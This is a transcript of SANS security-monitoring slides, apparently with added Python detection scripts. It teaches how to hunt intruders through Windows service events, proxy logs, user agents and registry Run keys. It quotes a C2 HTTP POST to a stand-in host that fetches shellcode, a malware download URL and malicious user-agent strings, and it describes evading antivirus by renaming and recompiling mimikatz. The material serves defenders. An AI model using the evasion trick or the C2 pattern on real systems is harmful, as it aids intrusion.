Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved
The Seamless Way Continuous Monitoring Can Defend Your Organization against Cyber Attacks
Eric Conrad (GSE #13) Twitter: @eric_conrad
Seth Misenar (GSE #28) Twitter: @sethmisenar
Our Approach to Continuous Monitoring
• We will focus on both threats and vulnerabilities, and highlight mitigation
  – And not monitoring for the sake of checking a box
• We will provide proven winning strategies
  – For example: tracking Microsoft service creation events
• We will also provide proper focus to both "what" and "how"
  – For example, later we will discuss monitoring Windows service creation events:
  – PS C:\> Get-WinEvent -FilterHashtable @{logname='system'; id=7030,7045}
Mandiant M-Trends 2015
Organizations made some gains, but attackers still had a free rein in breached environments far too long before being detected—a median of 205 days in 2014 vs. 229 days in 2013. At the same time, the number of organizations discovering these intrusions on their own remained largely unchanged. Sixty-nine percent learned of the breach from an outside entity such as law enforcement. That’s up from 67 percent in 2013 and 63 percent in 2012.[1]
[1] http://cyber.gd/m-trends-2015
Let’s Hunt
• Repeat after me: my network is already owned
• A hunt team is dedicated to finding intrusions that have evaded prevention and detection
• “If you're not hunting, you're losing” – Richard Bejtlich
A Word on Entropy
• Entropy means disorder
  – Strong encryption provides a ciphertext with high entropy
  – Random string: high entropy
  – Strings like “download” or “files”: lower entropy
• This is important because many types of malware (and penetration testing tools like Metasploit) use randomly-generated strings for directory names, file names, X.509 certificate information, etc.
  – This is done to avoid simple signature matching on the names
• We can use the malware’s mojo against it by detecting high-entropy:
  – File names, directory names, X.509 fields, etc.
High Entropy Examples
• BlackHole exploit kit
• Metasploit’s PsExec exploit
• Tbot
(The screenshots showing the high-entropy names from each are not reproduced in this transcript.)
Mandiant M-Trends 2015 on Mimikatz
In nearly all of our investigations, the victims’ anti-virus software failed to hinder Mimikatz, despite the tool’s wide reach and reputation. Attackers typically modified and recompiled the source code to evade detection.[1]
[1] http://cyber.gd/m-trends-2015
The Sed Persistent Threat (SPT)
• Windows mimikatz binary download
  – 70% AV detection rate
• Compiled mimikatz binary from source (no changes)
  – 31% AV detection rate
• Compiled mimidogz binary from source
  – s/mimikatz/mimidogz/g
  – 7% AV detection rate
This Dog Can Hunt!
Whack-a-Mole
• I re-scanned mimidogz a few hours later on VirusTotal, and Kaspersky suddenly detected it
• I re-scanned the next morning, and 6 more vendors detected it (13 total)
Announcing Mimiyakz: The Sed Persistent Threat (SPT) Strikes Again!
Application Whitelisting: The Time has Come
• Blacklisting will always fail vs. a smart attacker
• Application Whitelisting is:
  – Australian Signals Directorate Control #1
  – 20 Critical Security Controls "First Five"
• Make 2015 the year you deploy application whitelisting
"Aren't advanced attackers moving towards code and DLL injection…"
• Yes they are
  – Especially vs. systems that are hardened with application whitelisting
• The cardinal sin of preventive controls:
  – Set it and forget it
• Step 1: Deploy application whitelisting (preventive control)
• Step 2: Monitor blocked applications closely and react in real-time (detection FTW!)
Tracking AppLocker Alerts
• For sites that run AppLocker, these events should be monitored
• Audit mode:
  – 8003: <exe or dll> was allowed to run but would have been prevented from running if the AppLocker policy were enforced
  – 8006: <script or msi> was allowed to run but would have been prevented from running if the AppLocker policy were enforced
• Block/enforce mode:
  – 8004: <exe or dll> was not allowed to run
  – 8007: <script or msi> was not allowed to run
Mandiant M-Trends 2015 on Metasploit
• The Metasploit module used in this case was psexec_command, which allows attackers to run commands on the compromised system. The module executes commands as a Windows service. It leaves a number of forensic artifacts in the Windows system-event log.[1]
[1] http://cyber.gd/m-trends-2015
Critical Event 1: Service Creation
• Critical Security Control 14-9:
  – Monitor for service creation events and enable process tracking logs. On Windows systems, many attackers use PsExec functionality to spread from system to system. Creation of a service is an unusual event and should be monitored closely. Process tracking is valuable for incident handling.[1]
• We will demonstrate service creation via PsExec
[1] http://cyber.gd/511_465
System Event ID 7045 Normal Service Creation
• Services are often created when normal software is installed
  – This event was caused by installing WinPcap
  – Service creation events that occur on critical systems should be verified against change management requests
• Services created by use of the Sysinternals PsExec command must be verified
  – Does your policy allow the use of PsExec?
• High-entropy service names are highly suspicious!
  – Service Name: MmvTBipnvGFMNfUs
  – Service File Name: %SYSTEMROOT%\llTTAagm.exe
Attacker uses Metasploit PsExec Exploit
How Does this Differ from Normal PsExec?
• PsExec is a Windows Sysinternals tool
• PsExec functionality has been added to Metasploit
  – It is easy to spot the difference between the two versions in Windows event logs
System Event ID 7045 Sysinternals vs. Metasploit PsExec
Sysinternals PsExec:
  Service Name: PSEXESVC
  Service File Name: %SystemRoot%\PSEXESVC.exe
  Service Type: user mode service
  Service Start Type: demand start
  Service Account: LocalSystem

Metasploit PsExec:
  Service Name: MIehTND
  Service File Name: %SYSTEMROOT%\iRFMmxan.exe
  Service Type: user mode service
  Service Start Type: demand start
  Service Account: LocalSystem
System Event ID 7030 Track Errors
• Sysinternals PsExec generates no errors, but Metasploit’s generates Event ID 7030
  – The MIehTND service is marked as an interactive service. However, the system is configured to not allow interactive services. This service may not function properly
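An added example (my code, not part of the slides or a SEC511 tool) that turns the "high-entropy names" idea from the entropy slide and the 7045/7030 artifacts from the last three slides into a triage script: the event records are constructed in the shape of those System log events, and the name-scoring heuristic (vowel ratio, consonant runs, case switching, with Shannon entropy shown alongside) is my assumption about what separates the slide's generated names from normal ones.

```python
import math
import re
from collections import Counter

VOWELS = set("aeiouAEIOU")

# Constructed records in the shape of System log 7045 (service installed) and 7030
# (interactive service error) events; names are the ones quoted on the slides.
EVENTS = [
    {"id": 7045, "service": "NPF", "file": r"system32\drivers\npf.sys"},
    {"id": 7045, "service": "Spooler", "file": r"%SystemRoot%\System32\spoolsv.exe"},
    {"id": 7045, "service": "PSEXESVC", "file": r"%SystemRoot%\PSEXESVC.exe"},
    {"id": 7045, "service": "MIehTND", "file": r"%SYSTEMROOT%\iRFMmxan.exe"},
    {"id": 7030, "service": "MIehTND", "file": ""},
    {"id": 7045, "service": "MmvTBipnvGFMNfUs", "file": r"%SYSTEMROOT%\llTTAagm.exe"},
]

def shannon_entropy(s):
    """Bits per character of s's own character distribution (0.0 for empty)."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def random_signals(name):
    """Count 0-3 cheap 'machine-generated name' signals for a service or file name.
    Shannon entropy alone barely separates short names ('download' and 'PSEXESVC'
    both score 2.5 bits), so letter-level signals are used instead."""
    stem = re.sub(r"\.[A-Za-z0-9]{1,4}$", "", name.replace("\\", "/").rsplit("/", 1)[-1])
    letters = [c for c in stem if c.isalpha()]
    if len(letters) < 6:                 # abbreviations such as NPF: too short to judge
        return 0
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters)
    longest_run = max((len(r) for r in re.findall(r"[^aeiouAEIOU\W\d_]+", stem)), default=0)
    switches = sum(a.islower() != b.islower() for a, b in zip(letters, letters[1:]))
    case_ratio = switches / (len(letters) - 1)
    return int(vowel_ratio <= 0.2) + int(longest_run >= 4) + int(case_ratio >= 0.4)

def triage(events):
    """Rank 7045 events for review: name signals on service and file name, plus one
    point when a 7030 error names the same service (Metasploit's PsExec, not Sysinternals')."""
    errored = {e["service"] for e in events if e["id"] == 7030}
    ranked = []
    for e in events:
        if e["id"] != 7045:
            continue
        score = random_signals(e["service"]) + random_signals(e["file"])
        score += int(e["service"] in errored)
        if score:
            ranked.append((score, e["service"], e["file"]))
    return sorted(ranked, reverse=True)
```

Abbreviation-style names (a six-letter, all-consonant service name, say) trip the same signals, so treat the score as a ranking for analyst review and suppress names already accepted in your baseline rather than alerting on the score alone.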
Mandiant M-Trends 2015 Example C2 via HTTP POST
• The shellcode makes an HTTP POST request to a hard-coded IP address and downloads XOR-encoded shellcode contained within an HTML comment.[1]
POST /evil.txt HTTP/1.0
Accept: */*
Content-Length: 32
Content-Type: application/octet-stream
User-Agent: Evil_UA_String
Host: 1.2.3.4
Pragma: no-cache

<POST_DATA>
[1] http://cyber.gd/m-trends-2015
Proxies Rule!
Proxies keep cropping up over and over, because they are fundamentally a sound idea. Every so often someone re-invents the proxy firewall - as a border spam blocker, or a 'web firewall' or an 'application firewall' or 'database gateway' - etc. And these technologies work wonderfully. Why? Because they're a single point where a security-conscious programmer can assess the threat represented by an application protocol, and can put error detection, attack detection, and validity checking in place – Marcus Ranum
Proxy Win: Naked Downloads
• Perl script that parsed HTTP proxy logs to identify downloads of EXEs from ‘naked IPs’; first hit:
  – 172.17.103.3 - - [19/May/2014:15:48:10 -0400] "GET http://101.93.59.108/lksdfhwey/r.exe HTTP/1.0" 200 731 TCP_MISS:DIRECT
• “Why is a nursing station downloading software from a former Soviet Union country?”
  – EXE scanned clean by 2 separate antivirus programs (proxy and desktop)
• PC was compromised; inbound prevention and detection had failed
On That Same Note…
• The URL was:
  – http://101.93.59.108/lksdfhwey/r.exe
• Beyond the naked IP, it illustrates other common malware patterns:
  – Randomly-generated names, directories, function names, etc.
  – 1-character EXE name
• You can automate searches for these patterns!
Let’s Track User Agents
• HTTP user agents offer high-value data
• User agents are often “fudged” by malware, in conspicuous ways
Common User Agent Substrings
• Mozilla (Most browsers)
  – User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
• Opera (The Opera browser)
  – User-Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14
• Microsoft-CryptoAPI (Windows systems checking CRL servers)
  – User-Agent: Microsoft-CryptoAPI/6.0
Abnormal HTTP User Agents
• These are not normal:
  – User-Agent: getURLDown
  – User-Agent: loadMM
  – User-Agent: POSTtj
  – User-Agent: Downloader MLR 1.0.0
  – User-Agent: FULLSTUFF
  – User-Agent: GaurdMailRu
  – User-Agent: GuardMailRu
Tracking User Agents
• Our approach:
  – Configure your proxy to log user agents
  – Or your NextGen Firewall, or Bro, etc.
• Sort from least common to most common
  – Inspect the least common
• Sort from longest to shortest
  – Inspect the shortest
• Is this approach perfect?
  – Of course some types of malware can evade this check, and/or use actual legitimate user agent strings
  – It is a *very* useful approach
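An added example for the Naked Downloads slides and the user-agent slides above (my Python, not the authors' Perl script, which the transcript does not reproduce): it parses proxy log lines in the format shown on the Naked Downloads slide, extended with a trailing quoted User-Agent field that I assume the proxy has been configured to log, flags executables fetched straight from a naked IP, and builds the least-common-first and shortest-first user-agent views. The log lines are constructed; the first reuses the slide's URL and the getURLDown agent from the abnormal-agents list.

```python
import ipaddress
import re
from collections import Counter

# Constructed proxy log lines in the format shown on the slides, with a quoted
# User-Agent field appended (as a proxy configured to log user agents would emit).
LOG = """\
172.17.103.3 - - [19/May/2014:15:48:10 -0400] "GET http://101.93.59.108/lksdfhwey/r.exe HTTP/1.0" 200 731 TCP_MISS:DIRECT "getURLDown"
172.17.103.3 - - [19/May/2014:15:48:11 -0400] "GET http://101.93.59.108/lksdfhwey/c.php HTTP/1.0" 200 12 TCP_MISS:DIRECT "getURLDown"
172.17.40.12 - - [19/May/2014:15:49:02 -0400] "GET http://download.example.com/tools/npp.exe HTTP/1.1" 200 4096 TCP_MISS:DIRECT "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
172.17.40.13 - - [19/May/2014:15:49:05 -0400] "GET http://crl.microsoft.com/pki/crl/products/a.crl HTTP/1.1" 200 800 TCP_MISS:DIRECT "Microsoft-CryptoAPI/6.0"
172.17.40.14 - - [19/May/2014:15:50:00 -0400] "GET http://www.example.org/ HTTP/1.1" 200 5120 TCP_MISS:DIRECT "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
172.17.40.15 - - [19/May/2014:15:50:30 -0400] "GET http://www.example.org/news HTTP/1.1" 200 6000 TCP_MISS:DIRECT "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
"""

LINE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
                  r'(?P<status>\d{3}) (?P<bytes>\d+|-) (?P<action>\S+) "(?P<ua>[^"]*)"$')
URL = re.compile(r"^https?://(?P<host>[^/:]+)(?::\d+)?(?P<path>/[^?#]*)?")

def parse(log):
    """One dict per line that fits the format; malformed lines are skipped."""
    return [m.groupdict() for m in map(LINE.match, log.splitlines()) if m]

def is_naked_ip(host):
    """True when the host part of the URL is an IP literal rather than a name."""
    try:
        ipaddress.ip_address(host.strip("[]"))      # strip IPv6 brackets
        return True
    except ValueError:
        return False

def naked_downloads(rows):
    """Executables fetched straight from an IP literal; the third field marks the
    one-character file name pattern (r.exe) from the slides."""
    hits = []
    for r in rows:
        u = URL.match(r["url"])
        fname = (u.group("path") or "/").rsplit("/", 1)[-1] if u else ""
        if u and is_naked_ip(u.group("host")) and fname.lower().endswith((".exe", ".dll", ".scr")):
            hits.append((r["client"], r["url"], len(fname.rsplit(".", 1)[0]) == 1))
    return hits

def ua_long_tail(rows):
    """Two views of the user agents: least common first, and shortest first."""
    counts = Counter(r["ua"] for r in rows)
    rare_first = sorted(counts.items(), key=lambda kv: (kv[1], kv[0]))
    short_first = sorted(counts, key=lambda ua: (len(ua), ua))
    return rare_first, short_first
```

On this sample the rare-first view surfaces the legitimate CryptoAPI agent while the short-first view surfaces getURLDown, which is why the slides ask for both sorts.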
Our Approach on the Contagio Crimeware Pcap Collection
Mandiant M-Trends 2015 on Persistence
• Maintaining persistence has long been a hallmark of APT actors, who work to stay in an environment until they’ve completed their mission. But financial actors have increasingly shown their ability to maintain a low profile. In one case, cyber criminals maintained stealthy persistence using well-known Windows startup registry locations to launch their malware. In another, financial threat actors managed to maintain access to an environment for more than five years. We’ve even seen persistence in financial threat actors trying to get back into an environment after being kicked out.[1]
[1] http://cyber.gd/m-trends-2015
What does a Malicious Startup Registry Key Look Like?
• Attacker view: (screenshot not reproduced in this transcript)
• Victim view: (screenshot not reproduced in this transcript)
Windows Registry Startup Keys
• Query these keys across all Windows systems
  – HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  – HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
  – HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  – HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
• Add these (often forgotten)
  – HKLM\Software\Wow6432node\Microsoft\Windows\CurrentVersion\Run
  – HKLM\Software\Wow6432node\Microsoft\Windows\CurrentVersion\RunOnce
Accessing Registry Keys Remotely
• Only HKLM (HKEY Local Machine) and HKCU (HKEY Current User) are available via the remote registry service
  – HKCU is accessed via "HKU," and requires ".DEFAULT" added to the path
• Example remote registry commands:
  C:\> reg query \\<system>\HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  C:\> reg query \\<system>\HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
Example PowerShell Script
• This script uses PowerShell to wrap remote registry queries
Next Step: Long Tail Analysis
1. Query all startup registry run keys on all systems
2. Sort in order of duplicates, least to most
3. Then inspect the least frequently seen startup registry keys
   – Most organizations find malware
Then: Automate
• The first pass may be somewhat time consuming
  – But worthwhile
• Once that process is complete:
  – Re-run the script nightly
  – Report any new entries
• What you will find:
  – New software installs, both authorized and not
  – New Malware!
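An added example for the long-tail and automation steps above (my Python, not the authors' PowerShell script, which the transcript does not include): it parses the output of the reg query commands from the remote-registry slide as collected from several hosts, ranks each Run-key entry by how many hosts carry it with the rarest first, and, for the nightly re-run, reports entries absent from a previously reviewed baseline. The host names and values are constructed, and the WJNnRpQe entry is an invented random-looking value standing in for the kind of persistence the slides describe.

```python
import re
from collections import defaultdict

# Constructed 'reg query' output for three hosts, in the layout reg.exe prints
# (key line, then value lines as "    name    type    data"); the WJNnRpQe
# entry is an invented random-looking persistence value for the demonstration.
REG_OUTPUT = {
    "WKS01": r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
""",
    "WKS02": r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
""",
    "WKS03": r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    WJNnRpQe    REG_SZ    C:\Users\Public\Libraries\WJNnRpQe.exe
""",
}

VALUE = re.compile(r"^\s{2,}(?P<name>.+?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.*)$")

def parse_reg_query(text):
    """(key, name, data) tuples from one host's reg query output."""
    entries, key = [], None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
        elif key and (m := VALUE.match(line)):
            entries.append((key, m.group("name"), m.group("data")))
    return entries

def long_tail(per_host):
    """Each distinct (key, name, data) with how many hosts carry it, least common
    first: the rare entries are the ones an analyst inspects."""
    hosts = defaultdict(set)
    for host, text in per_host.items():
        for entry in parse_reg_query(text):
            hosts[entry].add(host)
    return sorted((len(h), entry, sorted(h)) for entry, h in hosts.items())

def new_entries(baseline, per_host):
    """Nightly run: (host, entry) pairs absent from the reviewed baseline."""
    seen = {(h, e) for h, text in baseline.items() for e in parse_reg_query(text)}
    return sorted((h, e) for h, text in per_host.items()
                  for e in parse_reg_query(text) if (h, e) not in seen)
```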
Sec511: Continuous Monitoring and Security Operations
Key Topics
• Current State Assessment
• Endpoint Security Architecture
• Network Security Architecture
• Security Operations Centers (SOC)
• Continuous Security Monitoring
• Network Security Monitoring
What makes this course special? Authored by two GSEs: Seth Misenar (#28) and Eric Conrad (#13). 1st Cyber Defense course with a day 6 D3TF (Design/Detect/Defend the Flag) competition.
• Twitter: @eric_conrad
• @sethmisenar
HTTP://SEC511.COM